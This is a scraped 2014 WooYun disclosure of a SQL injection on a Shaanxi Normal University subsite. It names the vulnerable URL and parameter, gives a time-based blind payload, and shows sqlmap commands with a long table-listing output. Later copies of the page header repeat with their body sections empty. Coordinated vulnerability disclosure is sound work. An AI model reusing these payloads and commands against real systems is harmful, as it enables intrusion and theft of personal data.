陕西师范大学某分站SQL注入 | wooyun-2014-061071| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-061071

漏洞标题：陕西师范大学某分站SQL注入

漏洞作者：从容

提交时间：2014-05-19 11:31

修复时间：2014-07-03 11:32

公开时间：2014-07-03 11:32

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-19：细节已通知厂商并且等待厂商处理中
2014-05-23：厂商已经确认，细节仅向厂商公开
2014-06-02：细节向核心白帽子及相关领域专家公开
2014-06-12：细节向普通白帽子公开
2014-06-22：细节向实习白帽子公开
2014-07-03：细节向公众公开

简要描述：

陕西师范大学某分站#&MySQL注入导致数据库大量重要信息泄露
涉及管理用户IP、学生数据、server信息、配置文件信息等等好多好多，光是跑表就跑了一个多小时- -.
主站：
http://www.snnu.edu.cn/

详细说明：

MySql注入点：

http://xiaobao.snnu.edu.cn/bencandy.php?id=965

---
Place: GET
Parameter: id
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=965' AND SLEEP(5) AND 'TCGQ'='TCGQ
---

漏洞证明：

#1、获取数据库：

./sqlmap.py -u "http://xiaobao.snnu.edu.cn/bencandy.php?id=965" --dbs

available databases [1]:
[*] xiaocao

#2、获取表段：

./sqlmap.py -u "http://xiaobao.snnu.edu.cn/bencandy.php?id=965" -D xiaocao --tables

+-------------------------------------------------+
| neuf                                            |
| new                                             |
| news_lostpass                                   |
| nguoidungs                                      |
| nodes                                           |
| noms                                            |
| not_null_test                                   |
| notafiscal                                      |
| notafiscal_deducao                              |
| notafiscal_itemnotafiscal                       |
| notizen                                         |
| nuke_banner_plans                               |
| nuke_banner_positions                           |
| nuke_bbauth_access                              |
| nuke_bbbanlist                                  |
| nuke_bbcategories                               |
| nuke_bbdisallow                                 |
| nuke_bbforum_prune                              |
| nuke_bbposts_text                               |
| nuke_bbsessions                                 |
| nuke_bbthemes_name                              |
| nuke_bbtopics_watch                             |
| nuke_bbuser_group                               |
| nuke_blocks                                     |
| nuke_comments                                   |
| nuke_counter                                    |
| nuke_downloads_downloads                        |
| nuke_downloads_editorials                       |
| nuke_faqanswer                                  |
| nuke_faqcategories                              |
| nuke_gallery_media_types                        |
| nuke_gallery_rate_check                         |
| nuke_gallery_template_types                     |
| nuke_groups                                     |
| nuke_journal                                    |
| nuke_journal_comments                           |
| nuke_journal_stats                              |
| nuke_links_editorials                           |
| nuke_links_links                                |
| nuke_links_newlink                              |
| nuke_main                                       |
| nuke_modules                                    |
| nuke_pages                                      |
| nuke_pages_categories                           |
| nuke_pollcomments                               |
| nuke_popsettings                                |
| nuke_referer                                    |
| nuke_reviews_main                               |
| nuke_stories_cat                                |
| nuke_subscriptions                              |
| nuke_topics                                     |
| nuked_page                                      |
| nulltest                                        |
| object                                          |
| object_link                                     |
| object_types                                    |
| oc                                              |
| oe                                              |
| offers                                          |
| oidtest                                         |
| oil_bannertrack                                 |
| oil_bfsurvey_pro_categories                     |
| oil_bfsurveypro_35                              |
| oil_biolmed_blocks                              |
| oil_biolmed_entity                              |
| oil_biolmed_entity_types                        |
| oil_biolmed_measurements                        |
| oil_biolmed_thesis                              |
| oil_categories                                  |
| oil_contact_details                             |
| oil_content                                     |
| oil_content_rating                              |
| oil_core_acl_aro                                |
| oil_core_acl_aro_sections                       |
| oil_dbcache                                     |
| oil_groups                                      |
| oil_jf_tableinfo                                |
| oil_languages                                   |
| oil_messages                                    |
| oil_messages_cfg                                |
| oil_migration_backlinks                         |
| oil_modules                                     |
| oil_modules_menu                                |
| oil_newsfeeds                                   |
| oil_phocadownload                               |
| oil_phocadownload_sections                      |
| oil_phocadownload_user_stat                     |
| oil_phocagallery_categories                     |
| oil_phocagallery_comments                       |
| oil_phocagallery_img_votes_statistics           |
| oil_phocagallery_votes                          |
| oil_poll_data                                   |
| oil_poll_date                                   |
| oil_poll_menu                                   |
| oil_rokdownloads                                |
| oil_rokversions                                 |
| oil_templates_menu                              |
| operation                                       |
| orderitems                                      |
| organizations                                   |
| osc_categories_description                      |
| osc_manufacturers_info                          |
| osc_products_images                             |
| osc_products_options_values                     |
| osc_products_options_values_to_products_options |
| outdoor_spaces                                  |
| p0fs                                            |
| page_log_exclusion                              |
| page_restrictions                               |
| papel                                           |
| part                                            |
| partenaire                                      |
| participate                                     |
| partscustomer                                   |
| partsvendor                                     |
| pass                                            |
| passe                                           |
| passes                                          |
| passw                                           |
| passwd                                          |
| pay_melodies                                    |
| payment                                         |
| payments                                        |
| perdorues                                       |
| permission                                      |
| person                                          |
| personal                                        |
| personne                                        |
| personnel                                       |
| pessoa_telefone                                 |
| pg_ts_cfgmap                                    |
| phones                                          |
| phorum_user                                     |
| phorum_users                                    |
| photo                                           |
| phpads_clients                                  |
| phpbb_categories                                |
| phpbb_config                                    |
| phpbb_confirm                                   |
| phpbb_forum_prune                               |
| phpbb_groups                                    |
| phpbb_posts_text                                |
| phpbb_privmsgs                                  |
| phpbb_privmsgs_text                             |
| phpbb_search_wordlist                           |
| phpbb_topics                                    |
| phpbb_topics_watch                              |
| phpbb_user_group                                |
| phpbb_vote_results                              |
| phpshop_categories                              |
| phpshop_links                                   |
| phpshop_news                                    |
| phpshop_opros                                   |
| plugin                                          |
| pma_bookmark                                    |
| pma_pdf_pages                                   |
| pma_tracking                                    |
| po_seq                                          |
| pokes                                           |
| pools                                           |
| portal_access                                   |
| portale                                         |
| power                                           |
| pricegroup                                      |
| primarytest2                                    |
| principal                                       |
| priorities                                      |
| problem                                         |
| procedure_data_set                              |
| processo                                        |
| procs_priv                                      |
| product                                         |
| product_colour_multi                            |
| product_font                                    |
| product_price                                   |
| product_size_multi                              |
| production_multiple                             |
| products                                        |
| produtos                                        |
| profession1                                     |
| profile_pictures                                |
| project_user_xref                               |
| projeto                                         |
| promotion                                       |
| protocol_action                                 |
| province                                        |
| psw                                             |
| pswd                                            |
| publicusers                                     |
| publisher                                       |
| pw                                              |
| pw_announce                                     |
| pw_banuser                                      |
| pw_favors                                       |
| pw_membercredit                                 |
| pw_members                                      |
| pw_msg                                          |
| pw_schcache                                     |
| pw_styles                                       |
| pw_threads                                      |
| pw_usergroups                                   |
| pw_wordfb                                       |
| pwd                                             |
| pwd1                                            |
| pword                                           |
| pwrd                                            |
| qrtz_blob_triggers                              |
| qrtz_triggers                                   |
| quanly                                          |
| querycache                                      |
| questions                                       |
| radacct                                         |
| rating_track                                    |
| reciprocal_links                                |
| redirect                                        |
| ref                                             |
| reg                                             |
| register                                        |
| registeration                                   |
| registriert                                     |
| reglement                                       |
| regusers                                        |
| rel_person_topic                                |
| relation_members                                |
| report                                          |
| resource_types                                  |
| result                                          |
| riddles                                         |
| rights                                          |
| rooms                                           |
| roster                                          |
| rss_read                                        |
| ruletest                                        |
| ruolo                                           |
| sailors                                         |
| salariedEmployees                               |
| salgrade                                        |
| sazog_urtiertoba_ge                             |
| sb_host_admin                                   |
| sb_host_adminAffichage1                         |
| sbreciprocal_cats                               |
| school                                          |
| sconfig                                         |
| scripts                                         |
| sea                                             |
| seite_abschnitt                                 |
| seite_layout                                    |
| sendmsgs                                        |
| sent_mails                                      |
| server                                          |
| servers                                         |
| service_request_log                             |
| services_links                                  |
| setup_                                          |
| sf_guard_user_group                             |
| sga_xplan_test                                  |
| shared_secrets                                  |
| sic                                             |
| sidebar                                         |
| singin                                          |
| siteIndexTable                                  |
| site_climatic                                   |
| site_environment                                |
| site_iwis                                       |
| site_stats                                      |
| situacaoitem                                    |
| size                                            |
| software_licenses                               |
| softwares                                       |
| solicitacao                                     |
| solicitacaosenha                                |
| soraldo_ele_tipo                                |
| sort                                            |
| special_category                                |
| specialty                                       |
| spip_breves                                     |
| spip_caches                                     |
| spip_index_dico                                 |
| spip_mots_articles                              |
| spip_mots_forum                                 |
| spip_ortho_dico                                 |
| spip_rubriques                                  |
| spip_signatures                                 |
| spip_versions                                   |
| spip_visites_articles                           |
| sporti_ge                                       |
| spt_datatype_info                               |
| spt_datatype_info_ext                           |
| spt_provider_types                              |
| staff                                           |
| staff_db                                        |
| standort                                        |
| stars                                           |
| statistiques                                    |
| statuses                                        |
| stellen                                         |
| store1                                          |
| store2                                          |
| students                                        |
| study_user                                      |
| stuseres                                        |
| stusers                                         |
| subject                                         |
| subscriber                                      |
| synchro_element                                 |
| synchro_type                                    |
| sys                                             |
| sys_acl_actions                                 |
| sys_acl_matrix                                  |
| sys_options_cats                                |
| sysadmins                                       |
| sysmaps_hosts                                   |
| sysmaps_links                                   |
| syssegments                                     |
| systime                                         |
| t1                                              |
| t_peep                                          |
| table_user                                      |
| tables                                          |
| taikhoan                                        |
| taikhoanquantri                                 |
| tamio                                           |
| taxonomy                                        |
| tb_account                                      |
| tb_accounts                                     |
| tb_administrator                                |
| tb_admins                                       |
| tb_login                                        |
| tb_logins                                       |
| tb_members                                      |
| tb_nguoidung                                    |
| tb_nguoidungs                                   |
| tb_usernames                                    |
| tb_users                                        |
| tbaccount                                       |
| tbaccounts                                      |
| tbadmins                                        |
| tblArtistCategory                               |
| tblConfigs                                      |
| tblLogBookAuthor                                |
| tblLogBookEntry                                 |
| tblLogBookImages                                |
| tblLogBookImport                                |
| tblNews                                         |
| tblOrders                                       |
| tblRestrictedPasswords                          |
| tbl_accounts                                    |
| tbl_admin                                       |
| tbl_categories                                  |
| tbl_client                                      |
| tbl_event                                       |
| tbl_member                                      |
| tbl_members                                     |
| tbl_state                                       |
| tbl_tech                                        |
| tbl_useraccounts                                |
| tbl_works                                       |
| tblaccount                                      |
| tbladmin                                        |
| tblblogcomments                                 |
| tblblogentriesrelated                           |
| tblblogroles                                    |
| tblblogsubscribers                              |
| tblclient                                       |
| tblclients                                      |
| tbllogin                                        |
| tbllogins                                       |
| tblnguoidungs                                   |
| tblogins                                        |
| tblproduct                                      |
| tblservers                                      |
| tblusers                                        |
| tbnguoidung                                     |
| tbuseraccount                                   |
| tbuseraccounts                                  |
| tbusers                                         |
| telecharger                                     |
| telefone                                        |
| telefono                                        |
| telephone                                       |
| templatelinks                                   |
| term                                            |
| test                                            |
| test_user                                       |
| test_users                                      |
| tests                                           |
| tf_log                                          |
| tf_messages                                     |
| tf_rss                                          |
| the                                             |
| theday                                          |
| tickers                                         |
| time_zone_transition_type                       |
| tipo_bolsa                                      |
| topicpublication                                |
| trackbacks                                      |
| traffic_selectors                               |
| transcache                                      |
| transfers                                       |
| translation                                     |
| trigger_depends                                 |
| tt_content                                      |
| type                                            |
| typeFacture                                     |
| typecompte                                      |
| un                                              |
| uname                                           |
| uniquetest                                      |
| uplebata_dacva_ge                               |
| upload                                          |
| uploads                                         |
| us                                              |
| userInfo                                        |
| user_admin                                      |
| user_connection                                 |
| user_defined_attribute                          |
| user_id                                         |
| user_login                                      |
| user_logins                                     |
| user_names                                      |
| user_newtalk                                    |
| user_password                                   |
| user_pword                                      |
| user_test                                       |
| user_un                                         |
| user_usern                                      |
| userid                                          |
| userlistuser_list                               |
| usern                                           |
| usernm                                          |
| userpwd                                         |
| userrights                                      |
| users_test                                      |
| usertbl                                         |
| usr                                             |
| usr2                                            |
| usrnam                                          |
| usrname                                         |
| usrs                                            |
| usuario                                         |
| utente                                          |
| utenti                                          |
| uvw_Pref                                        |
| vcd_MediaTypes                                  |
| vcd_MovieCategories                             |
| vcd_PornStudios                                 |
| vcd_Pornstars                                   |
| vcd_PropertiesToUser                            |
| vcd_Screenshots                                 |
| vcd_UserWishList                                |
| vcd_VcdToPornCategories                         |
| vendedores                                      |
| vendor_types                                    |
| vendortax                                       |
| venues                                          |
| veranstalter                                    |
| verwaltet                                       |
| viewLogBookEntry                                |
| views_track                                     |
| vip                                             |
| visual                                          |
| voraussetzen                                    |
| vrls_listing_images                             |
| vrls_listings                                   |
| vrls_xref_country                               |
| vwListAllAvailable                              |
| webadmins                                       |
| webcal_asst                                     |
| webcal_entry_repeats_not                        |
| webcal_group                                    |
| webcal_group_user                               |
| webcal_report                                   |
| webcal_report_template                          |
| webcal_user                                     |
| webmasters                                      |
| wh_man_children                                 |
| win                                             |
| works_on                                        |
| wp1_categories                                  |
| wp1_comments                                    |
| wp_comments                                     |
| wp_links                                        |
| wp_options                                      |
| wp_pod_fields                                   |
| wp_post2cat                                     |
| wp_postmeta                                     |
| wp_posts                                        |
| wp_term_taxonomy                                |
| xar_roles                                       |
| yabbse_settings                                 |
| yearend                                         |
| yhm                                             |
| zahlung_weitere                                 |
| zipcodes                                        |
| zl_advertisement                                |
| zl_article                                      |
| zl_baoming                                      |
| zl_deeds                                        |
| zl_finance                                      |
| zl_media                                        |
| zoph_people                                     |
| zutat                                           |
+-------------------------------------------------+
表段太多，就不全列出来了- -.

字段更是多的要命- -.
就不一一展示了- -.

修复方案：

版权声明：转载请注明来源从容@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：7

确认时间：2014-05-23 14:45

厂商回复：

已通知相关学校处理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-061071

漏洞标题：陕西师范大学某分站SQL注入

相关厂商：陕西师范大学

漏洞作者：从容

提交时间：2014-05-19 11:31

修复时间：2014-07-03 11:32

公开时间：2014-07-03 11:32

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源从容@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-061071

漏洞标题：陕西师范大学某分站SQL注入

相关厂商：陕西师范大学

漏洞作者： 从容

提交时间：2014-05-19 11:31

修复时间：2014-07-03 11:32

公开时间：2014-07-03 11:32

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-061071"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 从容@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：从容

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源从容@乌云